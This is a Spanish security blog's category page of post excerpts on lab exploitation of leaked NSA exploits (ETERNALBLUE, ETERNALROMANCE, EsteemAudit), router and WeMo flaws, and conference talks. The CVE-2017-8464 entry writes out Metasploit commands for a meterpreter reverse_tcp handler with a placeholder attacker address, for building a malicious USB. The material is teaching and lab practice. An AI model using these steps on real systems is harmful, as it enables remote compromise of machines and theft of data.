Archivo de la categoría: Videos

Explotando ETERNALROMANCE ETERNALSINERGY en Windows Server 2016

El exploit se encuentra en la popular base de datos de exploits: exploit-db. Es necesario agregar una cuenta valida de cualquier nivel de permisos y el nombre de un PIPE. 1. Abrir firefox en la siguiente liga: https://gist.github.com/hkm/ 2. Click … Sigue leyendo

Share
Publicado en Videos, Vulnerabilidades | Deja un comentario

Creando un USB malicioso con Microsoft Windows LNK Exploit: CVE-2017-8464

1. En Metasploit crea un HANDLER para recibir la conexión: msf 》 use exploit/multi/handler msf exploit(handler) 》 set payload windows/x64/meterpreter/reverse_tcp msf exploit(handler) 》 set LHOST TUDIRECCIÓNIP msf exploit(handler) 》 run 2. Ahora utiliza el exploit cve_2017_8464_lnk_rce para crear los archivos: … Sigue leyendo

Share
Publicado en Videos, Vulnerabilidades | Deja un comentario

Detectando y Explotando ETERNALBLUE en Windows 7 x64 con NMAP y Metasploit

Esta práctica consiste en utilizar el exploit ya incluido en Metasploit para comprometer un Windows 7 de 64 bits. 1. Identifica en que rango está la máquina virtual desde Kali: root@kali:~# ifconfig eth0 (el rango debe verse similar a 192.168.179.XXX) … Sigue leyendo

Share
Publicado en Videos, Vulnerabilidades | Deja un comentario

Explotando EsteemAudit en Windows 2003 x86 con EsteemAudit-2.1.0.exe desde Metasploit

La práctica consiste en explotar un Windows 2003 x86 con los exploits filtrados de la NSA desde Metasploit. La práctica incluye la instalación del ejecutable original de EsteemAudit-2.1.0.exe. 1. Identifica en que rango esta la máquina virtual desde Kali: root@kali:~# … Sigue leyendo

Share
Publicado en Videos, Vulnerabilidades | Deja un comentario

Scripts de NMap para Belkin Wemo Smart Switch

El Belkin WeMo Switch es un contacto eléctrico que puede ser controlado desde la red local. La versión actual del firmware (WeMo_WW_2.00.10966.PVT-OWRT-SNS) no requiere autenticación para prender o apagar el contacto eléctrico o para obtener información de las redes inalámbricas cercanas.   … Sigue leyendo

Share
Publicado en Exploits, Investigaciones, Scripts Nmap, Software, Videos, Vulnerabilidades | Deja un comentario

Explotación masiva de vulnerabilidades en ruteadores

Ver disapositivas Los métodos para escanear redes han evolucionado, y podemos encontrar millones de dispositivos de interconexión vulnerables que ponen en riesgo la información de sus propietarios y facilitan ataques a mayor escala. Mostraremos las técnicas que actualmente se utilizan … Sigue leyendo

Share
Publicado en Campus Party, Congresos, Investigaciones, Presentaciones, Videos, Vulnerabilidades | Deja un comentario

Videos de las conferencias de GuadalajaraCON 2013

Nuevas técnicas de optimización y ofuscación para inyección SQL por Roberto Salgado @LightOS de Websec En esta plática se demostrarán las técnicas más nuevas y avanzadas de optimización y ofuscación disponibles en el campo de inyecciones de SQL. Estas técnicas … Sigue leyendo

Share
Publicado en Congresos, GuadalajaraCON, Investigaciones, Presentaciones, Videos | Deja un comentario

Port knocking con el módulo Knockd para la Piña Wifi

El módulo knockd facilita la integración de port knocking a la piña wifi o wifi pineapple Mark IV. Port knocking consiste en identificar una secuencia específica de TCP para ejecutar algún comando. El binario knockd para linux es un servidor … Sigue leyendo

Share
Publicado en Investigaciones, Piña WiFi, Videos | Deja un comentario

Robo de cookies por router vulnerable (caso 2Wire)

Desde hace tiempo es conocido que los routers caseros están plagados de vulnerabilidades. En este caso mostramos como una serie de vulnerabilidades en routers 2Wire, al ser explotadas secuencialmente, permiten obtener remotamente los valores de las cookies de casi cualquier … Sigue leyendo

Share
Publicado en Exploits, Investigaciones, Videos, Vulnerabilidades | Deja un comentario

Videos de conferencias del segundo día de GuadalajaraCON

Día 2 Escaneo de puertos distribuido por Paulino Calderón (@calderpwn) Criptografía experimental por Eduardo Ruiz (@toorandom) DotDotPwn 3.0 por Alejandro Hernandez (@nitr0usmx) y Christian Navarrete (@chr1x) Cómo romper RSA con OpenSSL por Eduardo Ruiz (@toorandom) USB Attack Toolkit (UAT) por … Sigue leyendo

Share
Publicado en Congresos, GuadalajaraCON, Investigaciones, Presentaciones, Videos | 1 comentario